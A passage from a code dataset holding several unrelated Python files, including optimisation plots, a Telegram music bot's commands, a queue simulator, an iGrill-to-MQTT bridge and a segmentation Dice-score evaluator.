xmax))\nax.set_ylim((ymin, ymax))\n\nplt.show()\n\n\n# In[8]:\n\n\n# Newton-CG method\nx0 = np.array([3., 4.])\nfunc = value_and_grad(lambda args: f(*args))\nres = minimize(func, x0=x0, method='Newton-CG',jac=True, tol=1e-20, callback=print)\n\n\n# In[9]:\n\n\ndict(res)\n\n\n# In[10]:\n\n\ndef make_minimize_cb(path=[]):\n \n def minimize_cb(xk):\n # note that we make a deep copy of xk\n path.append(np.copy(xk))\n\n return minimize_cb\n\n\n# In[11]:\n\n\npath_ = [x0]\nres = minimize(func, x0=x0, method='Newton-CG',jac=True, tol=1e-20, callback=make_minimize_cb(path_))\ndict(res)\n\n\n# In[12]:\n\n\npath = np.array(path_).T\npath.shape\n\n\n# In[13]:\n\n\nfig, ax = plt.subplots(figsize=(10, 6))\n\nax.contour(x, y, z, levels=np.logspace(0, 5, 35), norm=LogNorm(), cmap=plt.cm.jet)\nax.quiver(path[0,:-1], path[1,:-1], path[0,1:]-path[0,:-1], path[1,1:]-path[1,:-1], scale_units='xy', angles='xy', scale=1, color='k')\nax.plot(*minima_, 'r*', markersize=18)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\n\n# In[14]:\n\n\nfig = plt.figure(figsize=(8, 5))\nax = plt.axes(projection='3d', elev=50, azim=-50)\n\nax.plot_surface(x, y, z, norm=LogNorm(), rstride=1, cstride=1, edgecolor='none', alpha=.8, cmap=plt.cm.jet)\nax.quiver(path[0,:-1], path[1,:-1], f(*path[::,:-1]), \n path[0,1:]-path[0,:-1], path[1,1:]-path[1,:-1], f(*(path[::,1:]-path[::,:-1])), \n color='k')\nax.plot(*minima_, f(*minima_), 'r*', markersize=10)\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\nax.set_zlabel('$z$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\n\n# In[15]:\n\n\nfig, ax = plt.subplots(figsize=(10, 6))\n\nax.contour(x, y, z, levels=np.logspace(0, 5, 35), norm=LogNorm(), cmap=plt.cm.jet)\nax.plot(*minima_, 'r*', markersize=18)\n\nline, = ax.plot([], [], 'b', label='Newton-CG', lw=2)\npoint, = ax.plot([], [], 'bo')\n\nax.set_xlabel('$x$')\nax.set_ylabel('$y$')\n\nax.set_xlim((xmin, xmax))\nax.set_ylim((ymin, ymax))\n\nax.legend(loc='upper left')\n\n\n# In[16]:\n\n\ndef init():\n line.set_data([], [])\n point.set_data([], [])\n return line, point\n\ndef animate(i):\n line.set_data(*path[::,:i])\n point.set_data(*path[::,i-1:i])\n return line, point\n\n\n# In[17]:\n\n\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=path.shape[1], interval=60, \n repeat_delay=5, blit=True)\n\n","repo_name":"hansun1994/Gradient_Descent_Visualization","sub_path":"gradient_descent_visual.py","file_name":"gradient_descent_visual.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"73168897267","text":"import pandas as pd \nimport glob\nimport os \nimport plotly.graph_objects as go\nfrom itertools import cycle\nfrom supervenn import supervenn\nimport seaborn as sns\nimport matplotlib.pyplot as plt \nimport numpy as np\n\n\n\nnotre=\"cov_filtering/notre/\"\nricalib=\"cov_filtering/ricalib/\"\nres_path=\"results_cov/venn_pdfs/\"\n\ninit= [\"Carbon_POL\", \"Carbon_TOT\", \"mock_POL\", \"mock_TOT\", \"Proton_POL\", \"Proton_TOT\", \"X-ray_POL\", \"X-ray_TOT\"]\n\nfor i in range(2):\n\tfolder = notre\n\tif i == 1 :\n\t\tfolder = ricalib\n\n\tfor b in init :\n\t\tfil10 = glob.glob(folder+b+'*.10filtered')\n\t\tfil20 = glob.glob(folder+b+'*.20filtered')\n\n\t\tsets10=[]\n\t\tfor j in fil10:\n\t\t\tdf = pd.read_csv(j, sep='\\t')\n\t\t\ts = set(df.dbsnp.ravel())\n\t\t\tsets10.append(s)\n\t\t\n\t\tsets20=[]\n\t\tfor j in fil10:\n\t\t\tdf = pd.read_csv(j, sep='\\t')\n\t\t\ts = set(df.dbsnp.ravel())\n\t\t\tsets20.append(s)\n\t\t\n\t\tpdf= res_path+b+\"_\"\n\n\t\tf10=[w[w.rindex(\"/\")+1:] for w in fil10]\n\t\tf20=[w[w.rindex(\"/\")+1:] for w in fil20]\n\n\t\t\n\t\tsupervenn(sets10, f10, widths_minmax_ratio=0.1, min_width_for_annotation=900, col_annotations_area_height=2, rotate_col_annotations=True)\n\n\t\t#plt.show()\n\t\t\n\t\tplt.savefig(pdf+\"10fil\"+'.pdf')\n\n\t\tplt.close()\n\n\t\tsupervenn(sets20, f20, widths_minmax_ratio=0.1, min_width_for_annotation=900, col_annotations_area_height=2, rotate_col_annotations=True,)\n\t\tplt.savefig(pdf+\"20fil\"+'.pdf')\n\t\t\n\t\tplt.close()\n\t\t\n","repo_name":"Elisshaze/tesi","sub_path":"venns.py","file_name":"venns.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"12596166896","text":"# © Cyril C Thomas\r\n# https://t.me/cyril_c_10\r\n\r\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup\r\nfrom Song.database.access_db import db\r\nimport shutil\r\nimport psutil\r\n\r\n#-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*#\r\ndef humanbytes(size):\r\n # https://stackoverflow.com/a/49361727/4723940\r\n # 2**10 = 1024\r\n if not size:\r\n return \"\"\r\n power = 2 ** 10\r\n n = 0\r\n Dic_powerN = {0: ' ', 1: 'Ki', 2: 'Mi', 3: 'Gi', 4: 'Ti'}\r\n while size > power:\r\n size /= power\r\n n += 1\r\n return str(round(size, 2)) + \" \" + Dic_powerN[n] + 'B'\r\n\r\n#-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*-----*#\r\n\r\nasync def start(bot, update):\r\n await update.reply_text(\r\n text=f\"Hi there, {update.from_user.mention} \\n\\nI can download Spotify Songs and Sent it Back to You\\n\\nSend me The Link and See the Magic......\\n\\n\\nMade with ❤️ by @c_bots_support\",\r\n quote=True,\r\n reply_markup=InlineKeyboardMarkup(\r\n [[\r\n InlineKeyboardButton(\r\n \"Support Channel\", url=\"https://t.me/c_bots_support\"),\r\n InlineKeyboardButton(\r\n \"DEV Contact\", url=\"https://t.me/c_text_bot\")\r\n ]]\r\n ),\r\n disable_web_page_preview=True,\r\n parse_mode=\"html\")\r\n\r\n\r\n\r\nasync def helper(bot, update):\r\n await update.reply_text(\r\n text=f\"Send Me The Song Link\\n\\nDownload The Music\\n\\nSend as Music File Back to You\\n\\nNot all Music Files Can be Downloaded, So Please be Patient\\n\\nFeel Free to Conatct me If you Spot any Bugs\\n\\n\\nMade with ❤️ by @c_bots_support\",\r\n quote=True,\r\n reply_markup=InlineKeyboardMarkup(\r\n [[\r\n InlineKeyboardButton(\r\n \"Support Channel\", url=\"https://t.me/c_bots_support\"),\r\n InlineKeyboardButton(\r\n \"DEV Contact\", url=\"https://t.me/c_text_bot\")\r\n ]]\r\n ),\r\n disable_web_page_preview=True,\r\n parse_mode=\"html\")\r\n\r\n\r\nasync def status(bot, update):\r\n total, used, free = shutil.disk_usage(\".\")\r\n total = humanbytes(total)\r\n used = humanbytes(used)\r\n free = humanbytes(free)\r\n cpu_usage = psutil.cpu_percent()\r\n ram_usage = psutil.virtual_memory().percent\r\n disk_usage = psutil.disk_usage('/').percent\r\n total_users = await db.total_users_count()\r\n await update.reply_text(\r\n text=f\"**Total Disk Space:** {total} \\n**Used Space:** {used}({disk_usage}%) \\n**Free Space:** {free} \\n**CPU Usage:** {cpu_usage}% \\n**RAM Usage:** {ram_usage}%\\n\\n**Total Users in DB:** `{total_users}`\",\r\n parse_mode=\"Markdown\",\r\n quote=True\r\n )\r\n\r\n","repo_name":"10cyrilc/Music-Downloader-Bot","sub_path":"Song/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"93"} +{"seq_id":"40012041644","text":"import os\r\nfrom functools import partial\r\nimport matplotlib.pyplot as plt\r\nimport nibabel as nib\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom train_pct import config\r\n\r\n\r\ndef get_organs_mask(data, index=1):\r\n return data == index\r\n\r\n\r\ndef dice_coefficient(truth, prediction):\r\n if np.sum(truth) == 0:\r\n return np.nan\r\n else:\r\n return 2 * np.sum(truth * prediction) / (np.sum(truth) + np.sum(prediction))\r\n\r\ndef loss_plot(model_dir):\r\n training_file = os.path.join(model_dir, \"training.log\")\r\n training_df = pd.read_csv(training_file).set_index('epoch')\r\n plt.figure()\r\n plt.plot(training_df['loss'].values, label='training loss')\r\n plt.plot(training_df['val_loss'].values, label='validation loss')\r\n plt.ylabel('Loss')\r\n plt.xlabel('Epoch')\r\n plt.xlim((0, len(training_df.index)))\r\n plt.legend(loc='upper right')\r\n plt.savefig(os.path.join(model_dir, \"loss_graph.png\"))\r\n plt.close()\r\n\r\ndef dice_plot(df, file_path):\r\n scores = dict()\r\n for index, score in enumerate(df.columns):\r\n values = df.values.T[index]\r\n scores[score] = values[np.isnan(values) == False]\r\n plt.boxplot(list(scores.values()), labels=list(scores.keys()))\r\n plt.ylabel(\"Dice Coefficient\")\r\n plt.grid()\r\n plt.gca().set_xticklabels(list(scores.keys()), rotation=30, fontsize=8)\r\n plt.savefig(file_path)\r\n plt.close()\r\n\r\n\r\ndef evaluate(data_dir, prediction_dir, header):\r\n masking_functions = [partial(get_organs_mask, index=index + 1) for index in range(len(header))]\r\n dice_rows = list()\r\n subject_ids = list()\r\n patients_list = os.listdir(prediction_dir)\r\n for patient in patients_list:\r\n dice = list()\r\n subject_ids.append(patient)\r\n truth_file = os.path.join(data_dir, patient, \"label.nii.gz\")\r\n truth = nib.load(truth_file).get_data()\r\n prediction_file = os.path.join(prediction_dir, patient, \"label.nii.gz\")\r\n prediction = nib.load(prediction_file).get_data()\r\n dice.extend([dice_coefficient(func(truth), func(prediction)) for func in masking_functions])\r\n dice_rows.append(dice)\r\n return dice_rows, subject_ids\r\n\r\n\r\nif __name__ == \"__main__\":\r\n header = ('Spleen', 'Pancreas', 'Left kidney', 'Gallbladder', 'Esophagus', 'Liver', 'Stomach', 'Duodenum')\r\n Dice = list()\r\n Patients = list()\r\n for i in range(5):\r\n print(\"Evaluating fold\" + str(i) + \"...\")\r\n config[\"model_dir\"] = os.path.join(config[\"result_path\"], config[\"model_name\"] + str(i))\r\n loss_plot(config[\"model_dir\"])\r\n test_data_path = os.path.join(config[\"data_path\"], \"fold\" + str(i))\r\n prediction_path = os.path.join(config[\"model_dir\"], \"prediction\")\r\n dice_rows, subject_ids = evaluate(test_data_path, prediction_path, header)\r\n Dice.extend(dice_rows)\r\n Patients.extend(subject_ids)\r\n df = pd.DataFrame.from_records(Dice, columns=header, index=Patients)\r\n df.to_csv(os.path.join(config[\"result_path\"], \"test_dice_scores.csv\"))\r\n df.describe().to_csv(os.path.join(config[\"result_path\"], \"test_dice_statistics.csv\"))\r\n dice_plot(df, os.path.join(config[\"result_path\"], \"test_dice_scores_boxplot.png\"))\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"RoadmapSoftware/CT_organs_dose","sub_path":"code/evaluate_pct.py","file_name":"evaluate_pct.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"} +{"seq_id":"19310110924","text":"from collections import deque\nimport pandas as pd\nimport numpy as np\n\nRT_lambda = int(input(\"Input inter-arrival time of RT messages: \"))\nnonRT_lambda = int(input(\"Input inter-arrival time of non RT messages: \"))\nRT_service = int(input(\"Input service time of an RT message: \"))\nnonRT_service = int(input(\"Input service time of a nonRT message: \"))\nmax_MC = int(input(\"Input the maximum Machine clock cycles you want to run the simulation for: \"))\n\n\nclass Simulator:\n def __init__(self, n_RT=0, n_nonRT=0, s=0, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST = -1, \\\n RT_lambda=10, nonRT_lambda=10, RT_service=4, nonRT_service=4, max_MC= 50):\n self.n_RT = n_RT #number of items in RT queue\n self.n_nonRT = n_nonRT #number of items in non RT queue\n self.s = s #sever status, 0: ideal, 1: servicing RT msg, 2: servicing nonRT msg\n self.SCL = SCL #service clock\n self.MC = MC #master clock\n self.RTCL = RTCL #next RT packet arrival time\n self.nonRTCL = nonRTCL #next non RT packet arrival time\n self.preempted_ST = preempted_ST #pre-empted service time\n self.RT_lambda = RT_lambda #RT msg inter-arrival time\n self.nonRT_lambda = nonRT_lambda #nonRT msg inter-arrival time\n self.RT_service = RT_service #RT service time\n self.nonRT_service = nonRT_service #nonRT service time \n self.RT_queue = deque([]) #store the arrival time of RT msg\n self.nonRT_queue = deque([])\n self.event_list = [[RTCL, 0], [nonRTCL, 1], [SCL, 2]]\n self.max_MC = max_MC\n self.df = pd.DataFrame(columns = ['MC', 'RTCL', 'nonRTCL', 'n_RT', 'n_nonRT', 'SCL', 's', 'preempted_ST'])\n\n def start_simulation(self):\n while self.MC <= self.max_MC:\n \n if any([self.n_RT, self.n_nonRT, self.SCL]):\n if self.preempted_ST == -1:\n self.preempted_ST = \"\"\n current_data = self.simulator_data()\n self.df = self.df.append(pd.Series(current_data, index=self.df.columns), ignore_index=True)\n print(\"MC: {}, RTCL: {}, nonRTCL: {}, nRT: {}, nnonRT: {}, SCL: {}, s: {}, pre-empted: {}\".format(*current_data))\n\t\n if self.preempted_ST == \"\":\n self.preempted_ST = -1\n\n if self.SCL == 0:\n event = min(self.event_list[:2])\n else:\n event = min(self.event_list)\n\n self.MC = event[0]\n if event[1] == 0:\n self.RT_arrival()\n \n elif event[1] == 1:\n self.nonRT_arrival()\n \n elif event[1] == 2:\n self.service_completion()\n\n def RT_arrival(self):\n self.RT_queue.append(self.RTCL)\n self.n_RT += 1\n self.RTCL = self.MC + self.RT_lambda\n self.event_list[0][0] = self.RTCL \n \n if self.n_RT == 1 and self.s!=1:\n self.RT_queue.popleft()\n if self.s == 2:\n self.preempted_ST = self.SCL - self.MC\n if self.preempted_ST > 0: \n self.n_nonRT += 1\n self.nonRT_queue.appendleft(self.preempted_ST + self.MC)\n elif self.preempted_ST == 0:\n self.preempted_ST = -1\n \n self.SCL = self.MC + self.RT_service\n self.event_list[2][0] = self.SCL\n self.n_RT -= 1\n self.s = 1\n\n \n def nonRT_arrival(self):\n self.nonRT_queue.append(self.nonRTCL)\n self.n_nonRT += 1\n self.nonRTCL = self.MC + self.nonRT_lambda\n self.event_list[1][0] = self.nonRTCL \n \n if self.n_nonRT == 1:\n if self.s == 0:\n self.nonRT_queue.popleft()\n self.SCL = self.MC + self.nonRT_service\n self.event_list[2][0] = self.SCL\n self.s = 2\n self.n_nonRT -= 1\n \n\n def service_completion(self):\n if len(self.RT_queue) > 0:\n self.SCL = self.MC + self.RT_service\n self.s = 1\n self.n_RT -= 1\n self.RT_queue.popleft()\n \n self.event_list[2][0] = self.SCL\n\n elif len(self.nonRT_queue) > 0:\n self.nonRT_queue.popleft()\n self.n_nonRT -= 1\n self.s = 2\n \n if self.preempted_ST > 0:\n self.SCL = self.MC + self.preempted_ST\n self.preempted_ST = -1\n else:\n self.SCL = self.MC + self.nonRT_service\n \n self.event_list[2][0] = self.SCL\n else:\n self.s = 0\n self.SCL = 0\n self.event_list[2][0] = 0\n\n def simulator_data(self):\n data = [self.MC, self.RTCL, self.nonRTCL, self.n_RT, self.n_nonRT, self.SCL, self.s, self.preempted_ST]\n return data\n \n def write_to_file(self, file_path):\n self.df.to_csv(file_path, index=False)\n\n\nsimulator1 = Simulator(n_RT=0, n_nonRT=0, s=2, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST=-1, \\\n RT_lambda=RT_lambda, nonRT_lambda=nonRT_lambda, RT_service=RT_service, \n nonRT_service=nonRT_service, max_MC=max_MC)\n\nfile_path1 = 'task2.1_output.csv'\nsimulator1.start_simulation()\nsimulator1.write_to_file(file_path1)\n\ndata = pd.read_csv(file_path1)\nprint(\"\\n\")\nprint(\"OUTPUT TABLE:\")\nprint(data)\n","repo_name":"ayush-bisht/IoT-Analytics","sub_path":"Simulation Task/Task 2/task2.1/task21.py","file_name":"task21.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"13819113450","text":"import json\nfrom graphviz import Digraph\n\nwith open('events.json') as events_file:\n events = json.load(events_file)\n\nhandlers = events[\"handlers\"]\nflows = events[\"flows\"]\npublishable = events[\"publishable\"]\nmissions = events[\"missions\"]\nprocess_conclusion = events[\"process_conclusion\"]\n\ndef is_publishable(name):\n return name in publishable\n\ndef node_event(g, name):\n color = 'lightblue4' if is_publishable(name) else 'lightblue2'\n g.node(name, shape='box', color=color, style='filled')\n\ndef node_handler(g, name):\n g.node(name, color='cornsilk', style='filled')\n\ndef node_flow(g, name):\n g.node(name, color='khaki', style='filled')\n\ndef node_step(g, name):\n g.node(name, color='darkolivegreen3', style='filled')\n\ndef handler_graph(g):\n for entry in handlers:\n handler = entry + ' Handler'\n\n for recv in handlers[entry]['receives']:\n node_event(g, recv)\n node_handler(g, handler)\n g.edge(recv, handler, label='handled by')\n\n for emit in handlers[entry]['emits']:\n node_event(g, emit)\n node_handler(g, handler)\n g.edge(handler, emit, label='emits')\n\n top = \"On Process Completion\"\n for processed in process_conclusion:\n node_event(g, processed)\n node_handler(g, top)\n g.edge(top, processed, label='emits')\n\n g.render()\n\ndef flow_graph(g):\n for entry in flows:\n flow = entry + ' Flow'\n\n for emit in flows[entry]:\n node_event(g, emit)\n node_flow(g, flow)\n g.edge(flow, emit, label='emits')\n\n g.render()\n\ndef mission_graph(g):\n for mission in missions:\n\n with g.subgraph(name='cluster_' + mission) as gm:\n gm.attr(label=mission + ' Mission', color='red')\n\n for step in missions[mission]['steps']:\n step_data = missions[mission]['steps'][step]\n step = step + ' Step'\n\n for filtered in step_data['filters']:\n node_event(gm, filtered)\n node_step(gm, step)\n gm.edge(step, filtered, label='filters')\n\n for emit in step_data['emits']:\n node_event(gm, emit)\n node_step(gm, step)\n gm.edge(step, emit, label='emits')\n\n g.render()\n\n\ng1 = Digraph('events_handler', filename='graphs/events_handler.dot')\ng2 = Digraph('events_flow', filename='graphs/events_flow.dot')\ng3 = Digraph('events_missions', filename='graphs/events_missions.dot')\n\ng1.attr(rankdir='LR')\ng2.attr(rankdir='LR')\ng3.attr(rankdir='LR')\n\nhandler_graph(g1)\nflow_graph(g2)\nmission_graph(g3)\n","repo_name":"HackerExperience/Helix","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"93"} +{"seq_id":"42561763524","text":"\"\"\"Typebot text typer for MacOS, Windows, and Linux - Jack Baumgartel\"\"\"\n\nimport pyautogui\nimport time\n\npyautogui.FAILSAFE = True\n\nstarttime = 20\n\n#Recieve message from user\n#print('What is your message?\\n')\nmessage = input('What is your message?\\n')\n\n#Split the message into individual words\nwords = message.split()\n\n#Recieve number of repetitions from user\nrepeats = int(input(\"How many times would you like to repeat this message?\\n\"))\n\n#Instruct user on operation\nprint('\\nOpen the location you wish to write your message, click in the type area, \\nand wait! The program will start typing your message in {}s. To end the \\nprogram, move your cursor quickly to any corner of your screen!'.format(starttime))\n\n#Delay the start\ntime.sleep(starttime)\n\n#Repeatedly type the message, pressing 'enter' in between each word\nfor j in range(repeats):\n\tfor i in range(len(words)):\n \t pyautogui.typewrite(words[i])\n \t pyautogui.press(\"enter\")\n\n\n\n\n\n\n\n","repo_name":"Jack-Baumgartel/Typebot-WordbyWord","sub_path":"typebot.py","file_name":"typebot.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"44102950530","text":"from builtins import range\nfrom config import strip_config\nfrom config import Config\nimport argparse\nfrom igrill import IGrillMiniPeripheral, IGrillV2Peripheral, IGrillV3Peripheral, Pulse2000Peripheral, DeviceThread\nimport logging\nimport paho.mqtt.client as mqtt\nimport boto3\nimport time\n\nconfig_requirements = {\n 'specs': {\n 'required_entries': {'devices': list, 'mqtt': dict},\n },\n 'children': {\n 'devices': {\n 'specs': {\n 'required_entries': {'name': str, 'type': str, 'address': str, 'topic': str, 'interval': int},\n 'optional_entries': {'publish_missing_probes': bool, 'missing_probe_value': str},\n 'list_type': dict\n }\n },\n 'mqtt': {\n 'specs': {\n 'required_entries': {'host': str,\n 'aws_cloudwatch_metrics': bool},\n 'optional_entries': {'port': int,\n 'keepalive': int,\n 'auth': dict,\n 'tls': dict}\n },\n 'children': {\n 'auth': {\n 'specs': {\n 'required_entries': {'username': str},\n 'optional_entries': {'password': str}\n }\n },\n 'tls': {\n 'specs': {\n 'optional_entries': {'ca_certs': str,\n 'certfile': str,\n 'keyfile': str,\n 'cert_reqs': str,\n 'tls_version': str,\n 'ciphers': str}\n }\n }\n }\n }\n }\n}\n\nconfig_defaults = {\n 'mqtt': {\n 'host': 'localhost'\n }\n}\n\nparser = argparse.ArgumentParser(description='Monitor bluetooth igrill devices, and export to MQTT')\nparser.add_argument('-c', '--config', action='store', dest='config_directory', default='.',\n help='Set config directory, default: \\'.\\'')\nparser.add_argument('-l', '--log-level', action='store', dest='log_level', default='INFO',\n help='Set log level, default: \\'info\\'')\nparser.add_argument('-d', '--log-destination', action='store', dest='log_destination', default='',\n help='Set log destination (file), default: \\'\\' (stdout)')\nparser.add_argument('--configtest', help='Parse config only',\n action=\"store_true\")\noptions = parser.parse_args()\n\n\ndef log_setup(log_level, logfile):\n \"\"\"Setup application logging\"\"\"\n\n numeric_level = logging.getLevelName(log_level.upper())\n if not isinstance(numeric_level, int):\n raise TypeError(\"Invalid log level: {0}\".format(log_level))\n\n if logfile != '':\n logging.info(\"Logging redirected to: \".format(logfile))\n # Need to replace the current handler on the root logger:\n file_handler = logging.FileHandler(logfile, 'a')\n formatter = logging.Formatter('%(asctime)s %(threadName)s %(levelname)s: %(message)s')\n file_handler.setFormatter(formatter)\n\n log = logging.getLogger() # root logger\n for handler in log.handlers: # remove all old handlers\n log.removeHandler(handler)\n log.addHandler(file_handler)\n\n else:\n logging.basicConfig(format='%(asctime)s %(threadName)s %(levelname)s: %(message)s')\n\n logging.getLogger().setLevel(numeric_level)\n logging.info(\"log_level set to: {0}\".format(log_level))\n\n\ndef mqtt_init(mqtt_config):\n \"\"\"Setup mqtt connection\"\"\"\n mqtt_client = mqtt.Client()\n\n if 'auth' in mqtt_config:\n auth = mqtt_config['auth']\n mqtt_client.username_pw_set(**auth)\n\n if 'tls' in mqtt_config:\n if mqtt_config['tls']:\n tls_config = mqtt_config['tls']\n mqtt_client.tls_set(**tls_config)\n else:\n mqtt_client.tls_set()\n\n mqtt_client.connect(**strip_config(mqtt_config, ['host', 'port', 'keepalive']))\n return mqtt_client\n\ndef putMetricData(metricName, value, currentTimestamp):\n cwClient = boto3.client('cloudwatch')\n response = cwClient.put_metric_data(\n Namespace='iGrill',\n MetricData=[\n {\n 'MetricName': metricName,\n 'Timestamp': currentTimestamp,\n 'Value': value\n }\n ]\n )\n\n logging.debug(\"putted metric data\")\n logging.debug(response)\n\n time.sleep(6)\n\ndef publish(temperatures, battery, heating_element, client, base_topic, device_name):\n aws_options = parser.parse_args()\n aws_config = Config(aws_options.config_directory, config_requirements, config_defaults)\n aws_mqtt_config = aws_config.get_config('mqtt')\n\n if 'aws_cloudwatch_metrics' in aws_mqtt_config and aws_mqtt_config['aws_cloudwatch_metrics'] == True:\n logging.debug(\"using aws cloudwatch metrics\")\n currentTimestamp = time.time()\n\n for i in range(1, 5):\n if temperatures[i]:\n putMetricData(\"probe\" + str(i), temperatures[i], currentTimestamp)\n if battery:\n putMetricData(\"battery\", battery, currentTimestamp)\n\n else:\n logging.debug(\"using legacy mqtt\")\n for i in range(1, 5):\n if temperatures[i]:\n client.publish(\"{0}/{1}/probe{2}\".format(base_topic, device_name, i), temperatures[i])\n\n if battery:\n client.publish(\"{0}/{1}/battery\".format(base_topic, device_name), battery)\n if heating_element:\n client.publish(\"{0}/{1}/heating_element\".format(base_topic, device_name), heating_element)\n\n\ndef get_devices(device_config):\n if device_config is None:\n logging.warn('No devices in config')\n return {}\n\n device_types = {'igrill_mini': IGrillMiniPeripheral,\n 'igrill_v2': IGrillV2Peripheral,\n 'igrill_v3': IGrillV3Peripheral,\n 'pulse_2000': Pulse2000Peripheral}\n\n return [device_types[d['type']](**strip_config(d, ['address', 'name'])) for d in device_config]\n\n\ndef get_device_threads(device_config, mqtt_config, run_event):\n if device_config is None:\n logging.warn('No devices in config')\n return {}\n\n return [DeviceThread(ind, mqtt_config, run_event, **d) for ind, d in\n enumerate(device_config)]\n","repo_name":"vandem9/igrill","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"93"} +{"seq_id":"71799970227","text":"#!/usr/bin/python3\n\"\"\" Module defining linked list class structure \"\"\"\n\n\nclass Node:\n\n \"\"\" Holds node-level data for linked list \"\"\"\n\n def __init__(self, data, next_node=None):\n if not isinstance(data, int):\n raise TypeError(\"data must be an integer\")\n else:\n self.__data = data\n if next_node is not None and not isinstance(next_node, Node):\n raise TypeError(\"next_node must be a Node object\")\n else:\n self.__next_node = next_node\n\n @property\n def data(self):\n return self.__data\n\n @data.setter\n def data(self, value):\n if not isinstance(value, int):\n raise TypeError(\"data must be an integer\")\n else:\n self.__data = value\n\n @property\n def next_node(self):\n return self.__next_node\n\n @next_node.setter\n def next_node(self, value):\n if value is not None and not isinstance(value, Node):\n raise TypeError(\"next_node must be a Node object\")\n else:\n self.__next_node = value\n\n\nclass SinglyLinkedList:\n\n \"\"\" A singly linked liist of ints \"\"\"\n\n def __init__(self):\n self.__head = None\n\n def sorted_insert(self, value):\n new = Node(value)\n if self.__head is None:\n self.__head = new\n return\n if new.data < self.__head.data:\n new.next_node = self.__head\n self.__head = new\n return\n current = self.__head\n while current.next_node and current.next_node.data < value:\n current = current.next_node\n new.next_node = current.next_node\n current.next_node = new\n\n def __str__(self):\n if self.__head is None:\n return \"\"\n current = self.__head\n s = []\n while current is not None:\n s.append(str(current.data))\n current = current.next_node\n return \"\\n\".join(s)\n","repo_name":"acbrimer/holbertonschool-higher_level_programming","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"13480170915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 4 10:51:37 2020\n\n@author: chlob\n\"\"\"\n\nfileTranslate = open(\"POSTags_PTB_Universal_Linux.txt\",'r')\nfileInit = open(\"wsj_0010_sample.pos.ref\",'r') # On rajoute un tilde à la fin pour éviter d'écraser le fichier source en cas de bug\nfileOut = open(\"wsj_0010_sample.pos.ref.univ\",'w+') # On rajoute un tilde à la fin pour éviter d'écraser le fichier source en cas de bug\n\ndico = {}\nlignesTranslate = fileTranslate.readlines()\nfor ligne in lignesTranslate:\n word = ligne.split(' ')\n print(ligne)\n dico[word[0]] = word[1]\n\n\n \n\nlignes = fileInit.readlines() # On parcours les lignes du fichier source\nligneSortie = \"\"\nfor ligne in lignes:\n toReplace = ligne.split('\\t')\n size = len(toReplace[1])\n replace = dico[toReplace[1][:size-1]]\n ligneSortie += toReplace[0] + '\\t' + replace\n \nfileOut.write(ligneSortie) # On écrit la nouvelle ligne dans le nouveau fichier \nfileTranslate.close()\nfileInit.close() # Fermeture du fichier source\nfileOut.close() # Fermeture du fichier écrit\n","repo_name":"philcl/TALProject","sub_path":"tp/TP3/script-stanford-to-univ.py","file_name":"script-stanford-to-univ.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"32805329896","text":"from wtforms import Form, StringField, SubmitField\nfrom wtforms.validators import DataRequired\nfrom flask_appbuilder.fieldwidgets import BS3TextFieldWidget, BS3TextAreaFieldWidget\nfrom flask_appbuilder.forms import DynamicForm\nfrom wtforms import widgets\n\n\nclass BS3TextAreaFieldWidget_1(widgets.TextArea):\n def __call__(self, field, **kwargs):\n kwargs[\"class\"] = u\"form-control\"\n kwargs[\"rows\"] = 10\n if field.label:\n kwargs[\"placeholder\"] = field.label.text\n return super(BS3TextAreaFieldWidget_1, self).__call__(field, **kwargs)\n\n\nclass BS3ButtonFieldWidget(widgets.SubmitInput):\n def __call__(self, field, **kwargs):\n kwargs[\"class\"] = u\"form-control\"\n #if field.label:\n # kwargs[\"placeholder\"] = field.label.text\n #if \"name_\" in kwargs:\n # field.name = kwargs[\"name_\"]\n return super(BS3ButtonFieldWidget, self).__call__(field, **kwargs)\n\n\nclass YamlForm(DynamicForm):\n baserun = StringField(('baserun'),\n description=(''),\n validators=[DataRequired()],\n widget=BS3TextFieldWidget())\n testrun = StringField(('testrun'),\n description=(''),\n validators=[DataRequired()],\n widget=BS3TextFieldWidget())\n yaml1 = StringField(('testrun_results config'),\n description=(''),\n validators=[DataRequired()],\n widget=BS3TextAreaFieldWidget_1())\n yaml2 = 